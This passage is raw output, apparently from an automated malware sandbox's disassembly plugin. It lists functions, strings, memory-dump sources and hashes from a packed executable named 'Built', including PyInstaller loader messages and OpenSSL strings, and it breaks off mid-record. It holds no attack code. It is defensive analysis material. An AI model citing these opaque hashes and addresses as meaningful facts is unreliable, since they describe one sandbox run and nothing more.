                                                              APIs
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF1273F61
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF1273F78
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF1273F8F
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF1273FC2
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF127400B
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF127403F
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF1274091
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF12740A4
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF12740BB
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF12740CE
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF12740E5
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF12740F8
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF127410F
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF1274122
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF1274135
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF1274148
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF127415B
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF12741A7
                                                              • 00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFDF1274B53,?,?,?,?,?,?,?,?,00007FFDF1272B8B), ref: 00007FFDF12741D2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true
                                                              • Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd
                                                              Similarity
                                                              • API ID: 00007B5630
                                                              • String ID: ANY PRIVATE KEY$CERTIFICATE$CERTIFICATE REQUEST$CMS$DH PARAMETERS$ENCRYPTED PRIVATE KEY$NEW CERTIFICATE REQUEST$PARAMETERS$PKCS #7 SIGNED DATA$PKCS7$PRIVATE KEY$TRUSTED CERTIFICATE$X509 CERTIFICATE$X9.42 DH PARAMETERS
                                                              • API String ID: 2248877218-1119032718
                                                              • Opcode ID: 53791607f956101f911f03bce5df1fcc48f1ca8588c3d50ca4fb3c9ab6ede07a
                                                              • Instruction ID: 745bcb147cc57ff5da82645e03483d5de7198a50be25d17528de47307bae5649
                                                              • Opcode Fuzzy Hash: 53791607f956101f911f03bce5df1fcc48f1ca8588c3d50ca4fb3c9ab6ede07a
                                                              • Instruction Fuzzy Hash: 7291AD51B0C69792FF50A765B972A7A26DD9F667E4F482230DD7EC22CDEF2CE4418200
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true
                                                              • Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd
                                                              Similarity
                                                              • API ID: 00007B5630
                                                              • String ID: ..\s\crypto\asn1\asn_mime.c$application/pkcs7-mime$application/pkcs7-signature$application/x-pkcs7-mime$application/x-pkcs7-signature$boundary$content-type$multipart/signed$type:
                                                              • API String ID: 2248877218-3630080479
                                                              • Opcode ID: c5e941614d640384612458e50034d29bbe1bfb110b92bc5b5dde121a4aa43e48
                                                              • Instruction ID: 425271e132668fc3b72419ae1836a71d17f81c212792778fb50be455bfabb407
                                                              • Opcode Fuzzy Hash: c5e941614d640384612458e50034d29bbe1bfb110b92bc5b5dde121a4aa43e48
                                                              • Instruction Fuzzy Hash: 63C1CEA2F0C24281FB20EB55A431EB963A9AF51784F544135E96D077CEEF3CE245EB00
                                                              APIs
                                                                • Part of subcall function 00007FF626649400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6266445E4,00000000,00007FF626641985), ref: 00007FF626649439
                                                              • ExpandEnvironmentStringsW.KERNEL32(?,00007FF6266488A7,?,?,00000000,00007FF626643CBB), ref: 00007FF62664821C
                                                                • Part of subcall function 00007FF626642810: MessageBoxW.USER32 ref: 00007FF6266428EA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                              • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                              • API String ID: 1662231829-930877121
                                                              • Opcode ID: 6fbdb188916104b0c2c5940302cfd80688c9116ecc918f500a0c860990a20752
                                                              • Instruction ID: 04a8cfa91c8a9c47066c1d2292dbf4f918ec7b05d4434c5f44187cc4d9a66969
                                                              • Opcode Fuzzy Hash: 6fbdb188916104b0c2c5940302cfd80688c9116ecc918f500a0c860990a20752
                                                              • Instruction Fuzzy Hash: 3851D621A1C68391FF719B26EC612BA6391FF94780F444035EA0EC26D5EF6EE404AF43
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcess
                                                              • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                              • API String ID: 2050909247-1550345328
                                                              • Opcode ID: b438ac9593aa65caaca4b757467b05afc463448879c6b570786e287927310b36
                                                              • Instruction ID: 9fd49d4c37a0bdb35a722818300c5b6cbf9a551bb22c82d0cf9a393ea00ed500
                                                              • Opcode Fuzzy Hash: b438ac9593aa65caaca4b757467b05afc463448879c6b570786e287927310b36
                                                              • Instruction Fuzzy Hash: 9B51BD21B0C64392EE20AB12EC611B9A390BF80794F444135EE0C97B96DF7EF555AB43
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true
                                                              • Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd
                                                              Similarity
                                                              • API ID: Event$FileSource$ByteCharDeregisterHandleMultiRegisterReportTypeWideWrite
                                                              • String ID: $OpenSSL$OpenSSL: FATAL$no stack?
                                                              • API String ID: 1270133462-2963566556
                                                              • Opcode ID: 4334f370b7a482bd35c4ecd3ae7f0d910e81077902a64c89114c2b2096981407
                                                              • Instruction ID: c29c2b8bd3cc78a3fb01a253d3540666c4d5fa2985889666c18b6fa97c4f5aa5
                                                              • Opcode Fuzzy Hash: 4334f370b7a482bd35c4ecd3ae7f0d910e81077902a64c89114c2b2096981407
                                                              • Instruction Fuzzy Hash: 5A91E133B08B8682EB209F24D8609FD3768FB85B94F444235EA6D07AD9EF38D255C340
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true
                                                              • Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd
                                                              Similarity
                                                              • API ID: 00007$A1370$B5630
                                                              • String ID: ..\s\crypto\ts\ts_conf.c$accuracy$microsecs$millisecs$p$secs
                                                              • API String ID: 751195488-1596076588
                                                              • Opcode ID: 8e1608afc237cc655a59732373ba8e0b1afa52b80ee81b2eea672c0bd8193b25
                                                              • Instruction ID: f9b57eaa60412a28cde256425ff3567be1b56219a7daeace1c95454c895e2f75
                                                              • Opcode Fuzzy Hash: 8e1608afc237cc655a59732373ba8e0b1afa52b80ee81b2eea672c0bd8193b25
                                                              • Instruction Fuzzy Hash: DF51C122B086079AEB11EB96A831EB973A9BF54B84F444435ED2E437D9EF3CE445D700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                              • String ID: P%
                                                              • API String ID: 2147705588-2959514604
                                                              • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                              • Instruction ID: b4d3d7b245f7f635bbbeb699d513663e80868ba9c8c7cce30d2e9e131e67c785
                                                              • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                              • Instruction Fuzzy Hash: FB510726614BA286DA349F22F8181BAB7A1F798B61F004121EFDE83794DF7DD085DB10
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                              • String ID: Needs to remove its temporary files.
                                                              • API String ID: 3975851968-2863640275
                                                              • Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                              • Instruction ID: 1426544a9756ec20af9dff9ae31493eface032b7b33c81044994c0759084944c
                                                              • Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                              • Instruction Fuzzy Hash: 56214F21B09A83C2EF558B7ABC641796350FF88B90F584235DA2DC33D8DE6DD5A19B03
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2109405337.00007FFE101D1000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFE101D0000, based on PE: true
                                                              • Associated: 00000005.00000002.2109058392.00007FFE101D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                              • Associated: 00000005.00000002.2109405337.00007FFE101E5000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                              • Associated: 00000005.00000002.2109475898.00007FFE101E6000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                              • Associated: 00000005.00000002.2109504920.00007FFE101E8000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffe101d0000_Built.jbxd
                                                              Similarity
                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                              • String ID:
                                                              • API String ID: 349153199-0
                                                              • Opcode ID: b9fa9b40e9c6789a1c7bb0bf4cecc2e391048a790accc609840ad08e000dacb4
                                                              • Instruction ID: 102c5d005946a40ecc7ab0b29632c07c8ba32af1afd407771baf6e6c665f84f9
                                                              • Opcode Fuzzy Hash: b9fa9b40e9c6789a1c7bb0bf4cecc2e391048a790accc609840ad08e000dacb4
                                                              • Instruction Fuzzy Hash: 1D819F23F08E4386FA50EB67A4592B96291AF457A0FD841B7DBCD477B6DE3CE4418700
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090834885.00007FFDF0FA1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FFDF0FA0000, based on PE: true
                                                              • Associated: 00000005.00000002.2090802749.00007FFDF0FA0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090834885.00007FFDF1004000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090834885.00007FFDF1050000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090834885.00007FFDF1053000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090834885.00007FFDF10AC000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090834885.00007FFDF10B1000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090834885.00007FFDF10B4000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091138354.00007FFDF10B5000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091174931.00007FFDF10B7000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf0fa0000_Built.jbxd
                                                              Similarity
                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                              • String ID:
                                                              • API String ID: 349153199-0
                                                              • Opcode ID: 4d981778426152582bd2bcf391e0cfb6d03b1f255c64df104127e21353c62d29
                                                              • Instruction ID: 4218d38c70e60c287a7ba638642fdfd1adacb06e51db33824f210fa54a254ccd
                                                              • Opcode Fuzzy Hash: 4d981778426152582bd2bcf391e0cfb6d03b1f255c64df104127e21353c62d29
                                                              • Instruction Fuzzy Hash: EB81A421F0C64346F7949B699469A792290AFC9BA0F048235E96CCF7DEDF3CE845A700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: -$:$f$p$p
                                                              • API String ID: 3215553584-2013873522
                                                              • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                              • Instruction ID: ec7ddd7b67d6b4d5751b74ee3fc6fcfd7aba4e139fa18444d0589274eba5fc10
                                                              • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                              • Instruction Fuzzy Hash: 5A12C372E0C25386FF205B15D91627976A1FB40754FA44035E68AC6AE6DF3EE880EF03
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: f$f$p$p$f
                                                              • API String ID: 3215553584-1325933183
                                                              • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                              • Instruction ID: 9632e876b8c1ce5351e1f41cf479b18e296a2ed9016b031683b40ff00222578a
